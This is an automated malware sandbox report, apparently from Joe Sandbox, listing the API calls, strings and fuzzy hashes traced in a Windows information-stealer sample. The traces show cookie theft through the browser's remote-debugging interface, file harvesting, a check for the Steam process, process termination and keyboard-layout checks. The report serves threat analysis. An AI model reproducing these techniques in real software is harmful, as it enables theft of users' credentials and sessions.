                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                            • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                            • API String ID: 958055206-1862457068
                            • Opcode ID: 946720ebc975939d91f40c2e19ebf88e7a51131cc3c53e603713d8fd7a85d54c
                            • Instruction ID: 53c8cbce9d1c93daaf4617956345799ab8519771655808d879ee870251dba837
                            • Opcode Fuzzy Hash: 946720ebc975939d91f40c2e19ebf88e7a51131cc3c53e603713d8fd7a85d54c
                            • Instruction Fuzzy Hash: B0914271A50208AFDB10DFB4DC85FEE77B8EF48700F144199F609A7191DBB1AA458BB0
                            APIs
                            • wsprintfA.USER32 ref: 00D7E22C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00D7E243
                            • StrCmpCA.SHLWAPI(?,00D917A0), ref: 00D7E263
                            • StrCmpCA.SHLWAPI(?,00D917A4), ref: 00D7E27D
                            • wsprintfA.USER32 ref: 00D7E2A2
                            • StrCmpCA.SHLWAPI(?,00D8CFEC), ref: 00D7E2B4
                            • wsprintfA.USER32 ref: 00D7E2D1
                              • Part of subcall function 00D7EDE0: lstrcpy.KERNEL32(00000000,?), ref: 00D7EE12
                            • wsprintfA.USER32 ref: 00D7E2F0
                            • PathMatchSpecA.SHLWAPI(?,?), ref: 00D7E304
                            • lstrcat.KERNEL32(?,00BFE8D0), ref: 00D7E335
                            • lstrcat.KERNEL32(?,00D91794), ref: 00D7E347
                            • lstrcat.KERNEL32(?,?), ref: 00D7E358
                            • lstrcat.KERNEL32(?,00D91794), ref: 00D7E36A
                            • lstrcat.KERNEL32(?,?), ref: 00D7E37E
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 00D7E394
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7E3D2
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7E422
                            • DeleteFileA.KERNEL32(?), ref: 00D7E45C
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D61557
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D61579
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D6159B
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D615FF
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00D7E49B
                            • FindClose.KERNEL32(00000000), ref: 00D7E4AA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                            • String ID: %s\%s$%s\*
                            • API String ID: 1375681507-2848263008
                            • Opcode ID: d31e94b9cb4ec5f1a85e0abe7a361e51dd98b612d86b86ab2542736aebacdce5
                            • Instruction ID: bdb77b335cb0022d62abc581bb50d318b0e3affff30603314e85d65e63c64e6c
                            • Opcode Fuzzy Hash: d31e94b9cb4ec5f1a85e0abe7a361e51dd98b612d86b86ab2542736aebacdce5
                            • Instruction Fuzzy Hash: 0E81707190021D9BCB20EFB4DC49AEE77B8FF48304F048999B51A93151EB75AA49CFB0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D616E2
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D61719
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6176C
                            • lstrcat.KERNEL32(00000000), ref: 00D61776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D617A2
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D618F3
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D618FE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat
                            • String ID: \*.*
                            • API String ID: 2276651480-1173974218
                            • Opcode ID: 2340130c0b3d6091cfa82fa92a006eb77b49723325eedd6928d26a404f22a3df
                            • Instruction ID: 16497eb8ec85d4e58a6cec87f3a45126e1e68393bf6164fc489f6c11ed62dc74
                            • Opcode Fuzzy Hash: 2340130c0b3d6091cfa82fa92a006eb77b49723325eedd6928d26a404f22a3df
                            • Instruction Fuzzy Hash: FC818D3995160ADBCB21EFA8D899ABE77B8EF44301F0C012AF815A7251DB709D45CFB1
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00D7DD45
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D7DD4C
                            • wsprintfA.USER32 ref: 00D7DD62
                            • FindFirstFileA.KERNEL32(?,?), ref: 00D7DD79
                            • StrCmpCA.SHLWAPI(?,00D917A0), ref: 00D7DD9C
                            • StrCmpCA.SHLWAPI(?,00D917A4), ref: 00D7DDB6
                            • wsprintfA.USER32 ref: 00D7DDD4
                            • DeleteFileA.KERNEL32(?), ref: 00D7DE20
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 00D7DDED
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D61557
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D61579
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D6159B
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D615FF
                              • Part of subcall function 00D7D980: memset.MSVCRT ref: 00D7D9A1
                              • Part of subcall function 00D7D980: memset.MSVCRT ref: 00D7D9B3
                              • Part of subcall function 00D7D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00D7D9DB
                              • Part of subcall function 00D7D980: lstrcpy.KERNEL32(00000000,?), ref: 00D7DA0E
                              • Part of subcall function 00D7D980: lstrcat.KERNEL32(?,00000000), ref: 00D7DA1C
                              • Part of subcall function 00D7D980: lstrcat.KERNEL32(?,00BFE1C8), ref: 00D7DA36
                              • Part of subcall function 00D7D980: lstrcat.KERNEL32(?,?), ref: 00D7DA4A
                              • Part of subcall function 00D7D980: lstrcat.KERNEL32(?,00BFCD80), ref: 00D7DA5E
                              • Part of subcall function 00D7D980: lstrcpy.KERNEL32(00000000,?), ref: 00D7DA8E
                              • Part of subcall function 00D7D980: GetFileAttributesA.KERNEL32(00000000), ref: 00D7DA95
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00D7DE2E
                            • FindClose.KERNEL32(00000000), ref: 00D7DE3D
                            • lstrcat.KERNEL32(?,00BFE8D0), ref: 00D7DE66
                            • lstrcat.KERNEL32(?,00BFD9A0), ref: 00D7DE7A
                            • lstrlen.KERNEL32(?), ref: 00D7DE84
                            • lstrlen.KERNEL32(?), ref: 00D7DE92
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7DED2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                            • String ID: %s\%s$%s\*
                            • API String ID: 4184593125-2848263008
                            • Opcode ID: 6ff35e601f49d05d0533807d7c49b3b35456ea62e000f8612b8f93efd363f774
                            • Instruction ID: afe7120b50fb3989cb704b8ebcd0967e1798de8f3bb7dcb47c097cadd06c0dc8
                            • Opcode Fuzzy Hash: 6ff35e601f49d05d0533807d7c49b3b35456ea62e000f8612b8f93efd363f774
                            • Instruction Fuzzy Hash: C3617171900208ABCB21EFB4DC89AEE77B9FF48300F0445A9F54AD7251EB74AA45CF60
                            APIs
                            • wsprintfA.USER32 ref: 00D7D54D
                            • FindFirstFileA.KERNEL32(?,?), ref: 00D7D564
                            • StrCmpCA.SHLWAPI(?,00D917A0), ref: 00D7D584
                            • StrCmpCA.SHLWAPI(?,00D917A4), ref: 00D7D59E
                            • lstrcat.KERNEL32(?,00BFE8D0), ref: 00D7D5E3
                            • lstrcat.KERNEL32(?,00BFE7D0), ref: 00D7D5F7
                            • lstrcat.KERNEL32(?,?), ref: 00D7D60B
                            • lstrcat.KERNEL32(?,?), ref: 00D7D61C
                            • lstrcat.KERNEL32(?,00D91794), ref: 00D7D62E
                            • lstrcat.KERNEL32(?,?), ref: 00D7D642
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7D682
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7D6D2
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00D7D737
                            • FindClose.KERNEL32(00000000), ref: 00D7D746
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 50252434-4073750446
                            • Opcode ID: 72a6ca5712f0f3b90ccb5a18521c081ec04ffe0875bfec617108e83af928c7b3
                            • Instruction ID: d8a4a167cd5eb7575d1e9055a9fd9ac5efdbf338134b2456151cc86d827478fa
                            • Opcode Fuzzy Hash: 72a6ca5712f0f3b90ccb5a18521c081ec04ffe0875bfec617108e83af928c7b3
                            • Instruction Fuzzy Hash: 2E61767191011D9BCF20EFB4DC88AEE77B9EF48300F048499E65993250EB74AA45CFB0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_
                            • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                            • API String ID: 909987262-758292691
                            • Opcode ID: 0d64577a62102bc9ba266923c2ed8d474f3c45cd94b1e339965d39c632d62d05
                            • Instruction ID: 7fa1c3252d23d5cca475937f9e811d07ba819dcf2c44fd96bec88003f9690029
                            • Opcode Fuzzy Hash: 0d64577a62102bc9ba266923c2ed8d474f3c45cd94b1e339965d39c632d62d05
                            • Instruction Fuzzy Hash: 61A24771D012699FDB20EFA8C8907EDBBB6FF48300F1485AAD509A7241DB715E85DFA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D723D4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D723F7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D72402
                            • lstrlen.KERNEL32(\*.*), ref: 00D7240D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7242A
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 00D72436
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7246A
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00D72486
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: \*.*
                            • API String ID: 2567437900-1173974218
                            • Opcode ID: ad6d839fe7ca570e66c3c604ebe18a60aed161862df34f8c4487e7f498ed550d
                            • Instruction ID: 09a45edfd6722b59b34aec6a63e30a351cf9a8bf354d7f69edaf9bfadec9cfca
                            • Opcode Fuzzy Hash: ad6d839fe7ca570e66c3c604ebe18a60aed161862df34f8c4487e7f498ed550d
                            • Instruction Fuzzy Hash: 7E418330552A498BCB31EFA8DC85ABE73B4FF54304F085129F84A97211DBB0DD458BB0
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00D846B9
                            • Process32First.KERNEL32(00000000,00000128), ref: 00D846C9
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00D846DB
                            • StrCmpCA.SHLWAPI(?,?), ref: 00D846ED
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D84702
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00D84711
                            • CloseHandle.KERNEL32(00000000), ref: 00D84718
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00D84726
                            • CloseHandle.KERNEL32(00000000), ref: 00D84731
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 3836391474-0
                            • Opcode ID: 3e6116fc63c46dffec24f9e82803daff4cb9fbbf7f646cdf6c87d014902fb16d
                            • Instruction ID: a75297278ea48faecde9f298a7678f298eb841c81d13f998cbb3d10580c652ab
                            • Opcode Fuzzy Hash: 3e6116fc63c46dffec24f9e82803daff4cb9fbbf7f646cdf6c87d014902fb16d
                            • Instruction Fuzzy Hash: 5D01D6315011196BE7206B74DC8DFFA377CEB4AB45F04008EF905D2090EFB499459BB0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 28^$;0Wy$Sq$mo$rFnh$r7_$tt;;$yM:_$u^}
                            • API String ID: 0-1887647372
                            • Opcode ID: 343f74f2fb426c36a91753a102461387563f073fe782f2fbace49c0c2e226606
                            • Instruction ID: d790fa0e06543a8d5db992f672d217b44f89a5cab2c2a23ab4b2ec24bb6d289c
                            • Opcode Fuzzy Hash: 343f74f2fb426c36a91753a102461387563f073fe782f2fbace49c0c2e226606
                            • Instruction Fuzzy Hash: 68B23BF3A0C214AFE3046E2DEC8567BB7D9EB94720F16453DE6C4C3744EA3598058697
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00D84628
                            • Process32First.KERNEL32(00000000,00000128), ref: 00D84638
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00D8464A
                            • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00D84660
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00D84672
                            • CloseHandle.KERNEL32(00000000), ref: 00D8467D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                            • String ID: steam.exe
                            • API String ID: 2284531361-2826358650
                            • Opcode ID: 1d9fc8d8f386aca50fcc13429af9ee91ba1594bdcf34fc9863e0d83c0f2149a2
                            • Instruction ID: e83e3d3bafbb72f8b28fe41a81e83068e42f67ffe622e5af2e7d794391e6501a
                            • Opcode Fuzzy Hash: 1d9fc8d8f386aca50fcc13429af9ee91ba1594bdcf34fc9863e0d83c0f2149a2
                            • Instruction Fuzzy Hash: 0F0167715051195BE720AB74AC4AFEA777CEF09750F0401DAED08D1050FFB499549BE5
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D74B51
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D74B74
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D74B7F
                            • lstrlen.KERNEL32(00D94CA8), ref: 00D74B8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D74BA7
                            • lstrcat.KERNEL32(00000000,00D94CA8), ref: 00D74BB3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D74BDE
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00D74BFA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID:
                            • API String ID: 2567437900-0
                            • Opcode ID: 2663b1c393b88a30dd64c0240573c6259dbe2a517d8a4a388636b899f4251174
                            • Instruction ID: 90da946dc28b6e2f001b140f41dcaaae98bd93bc39836f66bbd0fcac30cc712f
                            • Opcode Fuzzy Hash: 2663b1c393b88a30dd64c0240573c6259dbe2a517d8a4a388636b899f4251174
                            • Instruction Fuzzy Hash: 4B3163315629199BCB22EF68EC85EAE77B9FF54300F095129F80997211DBB0DD018BB0
                            APIs
                              • Part of subcall function 00D871E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00D871FE
                            • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00D82D9B
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00D82DAD
                            • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00D82DBA
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00D82DEC
                            • LocalFree.KERNEL32(00000000), ref: 00D82FCA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            • Opcode ID: cb679c9600293ff88ad26f4aa650ee091fcef5183e5e9925eddcfa2ace809e58
                            • Instruction ID: 525968201eb62838b2d22aeabba015324e907ed356147ac966c2d1670ea29e1d
                            • Opcode Fuzzy Hash: cb679c9600293ff88ad26f4aa650ee091fcef5183e5e9925eddcfa2ace809e58
                            • Instruction Fuzzy Hash: ADB1FB71904204CFD715DF19C948BA9B7F1FF44324F2AC1AAE4096B2A2D7769D82CFA4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
